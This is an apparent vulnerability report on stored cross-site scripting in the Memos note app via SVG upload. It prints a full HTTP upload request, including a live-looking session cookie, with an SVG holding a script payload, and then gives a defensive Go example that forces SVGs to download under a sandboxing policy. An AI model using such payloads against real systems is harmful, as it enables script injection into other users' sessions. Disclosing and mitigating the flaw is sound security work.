When a user uploads a file with a .svg extension and then accesses that file directly, the server responds with Content-Type: image/svg+xml, which leads the browser to process the SVG as an HTML file.
POST /api/resource HTTP/2
Host: demo.usememos.com
Cookie: memos_session=MTY3MTUzMjkzMXxEdi1EQkFFQ180UUFBUkFCRUFBQUhfLUVBQUVHYzNSeWFXNW5EQWtBQjNWelpYSXRhV1FEYVc1MEJBTUFfOG89fDYqserGzpcgkE9G0qSf_dQ9Q8rHAMeM_lb9V-vZecyd
Content-Length: 462
Sec-Ch-Ua: "Not?A_Brand";v="8", "Chromium";v="108"
Accept: application/json, text/plain, */*
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryFu7Yl3xXBKej60Xw
Sec-Ch-Ua-Mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36
Sec-Ch-Ua-Platform: "Windows"
Origin: https://demo.usememos.com
Referer: https://demo.usememos.com/?text=1&shortcutId=1
Accept-Encoding: gzip, deflate

------WebKitFormBoundaryFu7Yl3xXBKej60Xw
Content-Disposition: form-data; name="file"; filename="xss.svg"
Content-Type: image/svg+xml

<svg width="100%" height="100%" viewBox="0 0 100 100"
xmlns="http://www.w3.org/2000/svg">
<circle cx="50" cy="50" r="45" fill="green"
id="foo"/>
<script type="text/javascript">
// <![CDATA[
alert(window.origin);
// ]]>
</script>
</svg>
------WebKitFormBoundaryFu7Yl3xXBKej60Xw--
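
One server-side mitigation for the behaviour shown in this request, as an added example in Go; it is not code from this report or from the application it targets. The function name uploadHeaders and the inlineSafe allowlist are hypothetical choices made for this example: only listed raster image types are rendered inline, and everything else, including image/svg+xml, is sent as a download with a restrictive policy.

```go
package main

import (
	"fmt"
	"mime"
	"net/http"
)

// inlineSafe lists media types this example lets the browser render when the
// file URL is opened directly. image/svg+xml is left out on purpose: opened
// as a document, an SVG can run script in the serving origin.
var inlineSafe = map[string]bool{
	"image/png": true, "image/jpeg": true, "image/gif": true, "image/webp": true,
}

// uploadHeaders builds the response headers for a stored upload. storedType is
// the Content-Type recorded at upload time, so it is client-controlled.
func uploadHeaders(storedType, filename string) http.Header {
	mt, _, err := mime.ParseMediaType(storedType) // lowercases, drops parameters
	if err != nil {
		mt = "application/octet-stream"
	}
	disp := "attachment" // a direct visit downloads the file instead of rendering it
	if inlineSafe[mt] {
		disp = "inline"
	}
	h := http.Header{}
	h.Set("Content-Type", mt)
	h.Set("Content-Disposition", mime.FormatMediaType(disp, map[string]string{"filename": filename}))
	h.Set("X-Content-Type-Options", "nosniff") // no sniffing into another type
	// Second layer if the file is rendered anyway: no script, sandboxed origin.
	h.Set("Content-Security-Policy", "default-src 'none'; sandbox")
	return h
}

func main() {
	// Constructed inputs; the first matches the xss.svg upload in the request.
	for _, c := range [][2]string{{"image/svg+xml", "xss.svg"}, {"image/png", "a.png"}} {
		h := uploadHeaders(c[0], c[1])
		fmt.Println(c[1], "->", h.Get("Content-Type"), "|", h.Get("Content-Disposition"))
	}
}
```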